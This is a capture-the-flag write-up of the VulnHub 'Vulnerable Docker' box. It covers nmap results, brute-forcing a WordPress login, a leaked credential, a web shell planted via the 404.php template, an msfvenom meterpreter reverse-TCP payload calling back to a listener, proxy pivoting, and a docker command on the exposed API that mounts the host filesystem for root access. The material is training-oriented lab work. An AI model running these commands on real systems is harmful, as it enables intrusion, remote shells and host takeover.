CTF-Writeups/VulnHub/Vulnerable_docker.md
2021-03-26 15:21:40 +05:00

5.2 KiB

Vulnhub- Vulnerable Docker (Easy)

We don't need to use netdiscover or any other tool to get IP of the box since it already shows at login banner

NMAP

nmap -p- -sC -sV <ip>

PORT     STATE SERVICE VERSION                                            
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                            
|   1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)            
|   2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
|   256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_  256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
2375/tcp open  docker  Docker 17.06.0-ce                                  
| docker-version:                                                         
|   BuildTime: 2017-06-23T21:17:13.228983331+00:00                        
|   Arch: amd64
|   KernelVersion: 3.13.0-128-generic 
|   ApiVersion: 1.30
|   MinAPIVersion: 1.12
|   GitCommit: 02c1d87
|   Version: 17.06.0-ce
|   GoVersion: go1.8.3
|_  Os: linux
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Wed, 24 Mar 2021 18:06:13 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Wed, 24 Mar 2021 18:05:48 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Api-Version: 1.30
|     Docker-Experimental: false
|     Ostype: linux
|     Server: Docker/17.06.0-ce (linux)
|     Date: Wed, 24 Mar 2021 18:05:48 GMT
|     Content-Length: 0
|     Content-Type: text/plain; charset=utf-8
|   docker: 
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.1
| http-robots.txt: 1 disallowed entry  
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker &#8211; Just another WordPress site
MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)

PORT 2375 (Docker)

Since docker api is exposed we can try connecting to port by listing images

We can also see which containers are currently running

wordpress:WordPressISBest

PORT 8000

Running wpscan

We can now bruteforce the password for bob

Using these credentials we can login to wordpress site

To get a shelll we can edit 404.php template of the currently active theme

Alternatively you can get a meterpreter shell my generating a payload with msfvenom

Now in order to do pivoting web shell are not stable (in both windows and linux ) so after we got the intial foothold we may need to stablize our shell in meterpreter we have to sepefically generate a linux payload

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf

Unstable shell

New meterpreter shell

Now we have added the route to subnet 172.18.0.0 for docker container , we can now scan for open ports on the container and since there are more as we saw from enumerating docker port

Start socks4a proxy

Use foxyproxy to switch to socks4a proxy and since port 8022 is open we can see what's there

This container has docker.sock which allows to communicate with docker meaning creating , adding ,deleting container so there's a trick to mount the host system on the docker container by uploading docker and run command docker run -it -v /:/host/ <container_name> chroot /host/ bash binary instead we have docker port and we can access those container so we can remotely do this

docker -H tcp://192.168.1.7:2375 run --rm -it -v /:/host wordpress chroot /host bash

And we can read the the flag which means we are on a host machine